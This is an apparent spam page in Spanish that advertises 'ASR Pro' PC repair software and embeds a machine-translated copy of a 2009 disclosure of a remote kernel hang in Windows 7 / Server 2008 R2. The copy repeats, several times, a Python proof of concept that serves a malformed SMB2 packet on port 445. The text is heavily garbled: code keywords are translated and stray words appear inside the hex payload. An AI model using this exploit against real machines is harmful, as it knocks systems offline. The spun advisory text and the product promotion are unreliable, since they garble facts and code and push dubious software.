Resuelto: Sugerencias Para Solucionar Problemas Y Corregir El Bloqueo Del Kernel De Soporte Informático En Línea De Windows 7 / Server 2008r2.

Table of Contents

Aprobado

1. Descargar ASR Pro

2. Abra el programa y seleccione "Escanear su computadora"

3. Haga clic en "Reparar" para iniciar el proceso de reparación

El software para reparar su PC está a solo un clic de distancia: descárguelo ahora.

Si Windows 7 o Server 2008r2 Remote Kernel se bloquea en su computadora, esperamos que esta excelente guía del usuario pueda ayudarlo a corregir el problema. gramo.Bucle infinito del cliente SMB de Microsoft Windows 7th / Server 2008 R2: aprovecha la falta de éxito para realizar operaciones en el cliente SMB de Microsoft Windows en Windows 7th más Windows Server 2008 R2. La mayoría de las veces falla el kernel remoto. Metasploit Framework contiene un módulo para ayudar a aprovechar mi vulnerabilidad.

gramo.

  #! / usr / bin y python# win7-crash.Trigger py:# fallo del kernel remoto en el servidor host Win7 plus 2008R2 (bucle infinito)# KeAccumulateTicks () se bloquea al ser propietario de NT_ASSERT () / DbgRaiseAssertionFailure () causado por potentes# Ciclo sin fin.# NO BSOD, DEBE DESCONECTAR EL CONECTOR.# Para llamarlo rápidamente; en obtener:  this_script_ip_addr  BLAH, muere sin esfuerzo# Autor: Laurent Gaffi¯ ¿ ½Importar servidor de socketEl paquete equivale a (" x00  x00  x00  x9a" longitud del número ---> debe ser el noveno, no el 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x41  x00  x01  x00  x02  x02  x00  x00  x30  x82  xa4  x11  xe3  x12  x23  x41"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62  x60  xca  x01"" xcb  x51  xe0  x19  x62  x60  xca  x01  x80  x00  x1e  x00  x20  x4c  x4d  x20"" x60  x1c  x06  x06  x2b  x06  x01  x05  x05  x02  xa0  x12  x30  x10  xa0  x0e"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")Universidad SMB2 (SocketServer.BaseRequestHandler):  Def-Handle (ella misma):        copia impresa "Quién:", self.client_address        Utilice "GRACIAS SDL"       La entrada implica self.request.recv (1024)        self.request.send (paquete)        self.request.close ()El lanzamiento equivale a SocketServer.TCPServer (('', 445), SMB2) # su refrigerador en todas las interfaces ciudad 445launch.serve_forever ()

Este error siempre es una prueba importante de que SDL FAIL
El objetivo del error es un excelente bucle infinito en smb1,2, autenticación previa, específicamente no se requieren credenciales …
Puede terminar lanzado en la red local como un (IE *)
Es probable que el error sea tan simple que lo ideal sería que un SDL específico lo hubiera descubierto en 2 años si ese SDL ya existía:

netbios_header es igual a struct.pack (“> i”, len (”. regístrate con (SMB_packet)) + SMB_packet
(La nube de etiquetas netbios h2 indica la longitud del otro paquete smb1,2).

Si el número de móvil netbios_header es 4 bytes menos o mucho más que SMB_packet, ¡la situación se viola rápidamente!
QUE TIPO ?? ¿Me están tomando el pelo, ¿dónde está mi SDL?

Windows 7 / dispositivo 2008r2 bloqueo remoto del kernel

“El kit de funcionamiento más seguro de la luz. Е”;
Ese firewall personal correcto configurado debe eliminarse a través de IE, incluso con el método de transmisión nbns (sin interacción del controlador)

==============================================
– Fecha de lanzamiento: 11 de noviembre de 2009
– Descubierto por: Laurent Gaffier
– Gravedad: clase media / alta
============================================

fallo del kernel remoto de windows 8 / server 2008r2

NS. CONFIRMACIÓN DEL CONCEPTO
————————–
# win7-crash.py:
# Ejecutando una falla real del kernel del controlador remoto bajo Win7 y esta es la razón por la que Server 2008R2 (bucle infinito)
# KeAccumulateTicks () se bloqueó debido a NT_ASSERT () / DbgRaiseAssertionFailure () causado por un número fuerte de bucle infinito.
# NO BSOD, TIENES UN CORCHO.
# Para llamarlo rápidamente; en orden: this_script_ip_addr BLAH, disminuya instantáneamente
# Publicado por Laurent Gaffier
#

El paquete equivale a (número ” x00 x00 x00 x9a” —> La quinta longitud debería ser 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

V. IMPACTO COMERCIAL
————————–
Un atacante puede deshacerse de forma remota de cualquier servidor Windows 2008R2 7
en la red local o con la ayuda de IE

Vii. Solución de parche
————————–
simplemente no está disponible para esta instancia, a todos sus ISP no les importa.
Cierre el atributo SMB y los puertos hasta que se proporcione una auditoría válida.

X. HISTORIA DE CAMBIOS
————————–
8 de noviembre de 2009: MSRC saluda a
8 de noviembre de 2009: MSRC descubrió una vulnerabilidad
11 de noviembre de 2009: MRSC está tratando de volver a convencerme porque hay un error de IPv6 de varios proveedores que no deberían aparecer en los informes de seguridad.
11 de noviembre de 2009: esta valiosa perturbación ha sido lanzada.

XI. NOTAS
————————–
La información legal contenida en un aviso distinto se proporciona “tal cual”
sin manifestaciones ni garantías de conveniencia o.
No acepto ningún problema causado por el operador o de lo contrario
Mal uso de esta información.

Divulgación completaArchivos de listas de distribución

Fallo del kernel remoto Windows algunos Server 2008R2De: laurent gaffie
Fecha: gmail Miércoles 11 de noviembre de 2009 05:58:44 – 05:00
============================================- FECHA de emisión: 11 de noviembre de 2009- Recién descubierto: Laurent Gaffier- Gravedad: Media / Alta.==============================================I. VULNERABILIDAD————————–Bloqueo de kernel remoto Windows 1, * Server 2008R2II. CONTEXTO————————–# FALLO, # FALLO, # FALLOSDL FAIL, “El sistema operativo más seguro de todos los tiempos” -> Kernel remoto en minutos.# FALLO, número FALLO, # FALLOIII. DESCRIPCIÓN————————–Consulte: http://g-laurent.blogspot.com/ para obtener más información y muchos detalles.# Comentario: Este error se conoce principalmente porque Windows 7 / 2008R2.NS. PRUEBA CONCEPTUAL————————–# win7-crash.py:# Ejecución de otro bloqueo remoto del kernel relacionado con Win7 además del servidor de alojamiento de Internet 2008R2 (bucle infinito)# KeAccumulateTicks () se bloquea expectante en NT_ASSERT () / DbgRaiseAssertionFailure ()summoningano bucle sin fin.# NO BSOD, DESCONECTE EL CONECTOR.# Para un lanzamiento rápido como resultado del objetivo: this_script_ip_addr BLAH, inmediatamentechoque#Autor: Laurent Gaffier#Importar servidor de socketEl paquete es igual a ” x00 x00 x00 x9a” # —> probablemente el noveno, y ciertamente no el 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”Clase SMB2 (SocketServer.BaseRequestHandler): outl administrar (automático): “Quién:” Imagen, self.client_address La entrada significa que self.request.recv (1024) self.request.send (paquete) self.request.close ()Inicio significa SocketServer.TCPServer ((”, 445), SMB2) # escuchando en todos los puertos445ejecutar interface.serve_forever ()#SDL FAILV. EMPRESARIAL Ataque de yo diría el agresor————————–y puede bloquear de forma remota prácticamente Windows 7 / Server 2008R2.VI … SISTEMAS RESERVADOS————————–Windows 7, Windows 2008R2VII servidor. SOLUCIÓN————————–Es casi seguro que no hay ningún parche en este momento, a la mayoría de los proveedores no les importa un comino.Cierre el elemento SMB y las ranuras hasta que normalmente se realice una auditoría real.VIII. REFERENCIAS————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Préstamos————————–Esta vulnerabilidad fue implementada y también por Laurent Gaffier. descubiertoLaurent.gaffieremove-this (arroba) gmail.comX. HISTORIA DE REVISIONES————————–8 de noviembre de 2009: contacto con MSRC.9 de noviembre de 2009: MSRC ha identificado la nueva vulnerabilidad.11 de noviembre de 2009: MRSC es esto para convencerse a sí mismo de que IPv6 totalmente de varios proveedores es un error.no debería aparecer en los boletines de seguridad.11 de noviembre, el año acaba de terminar: Lanzamiento de Win Remote 7 Kernel SmashXI. AVISO LEGAL————————–La información de esta atención se proporciona “tal cual”.sin garantías junto con ofertas de uso, o de otra manera.No soy responsable del desgaste además del desgarro causado por el uso cuando se trata de oabusar de esta información.XII Notas personales————————–Más kernels FD @MS remotos llegarán en una fecha posterior significativa.

 ________________________________________________Género Mi información asociada a la divulgación: confíe ahora mismo.Carta: http://lists.grok.org.uk/full-disclosure-charter.htmlRecién publicado y patrocinado por Secunia Http: // secunia-.com/

Por fecha Por Cable

Transmisión actual:

Windows Server 2008R2 Powerful Remote Kernel Crash por Laurent Gaffy (11 de noviembre)

Aprobado

La herramienta de reparación ASR Pro es la solución para una PC con Windows que funciona lentamente, tiene problemas de registro o está infectada con malware. Esta herramienta poderosa y fácil de usar puede diagnosticar y reparar rápidamente su PC, aumentando el rendimiento, optimizando la memoria y mejorando la seguridad en el proceso. No sufra más por una computadora lenta: ¡pruebe ASR Pro hoy!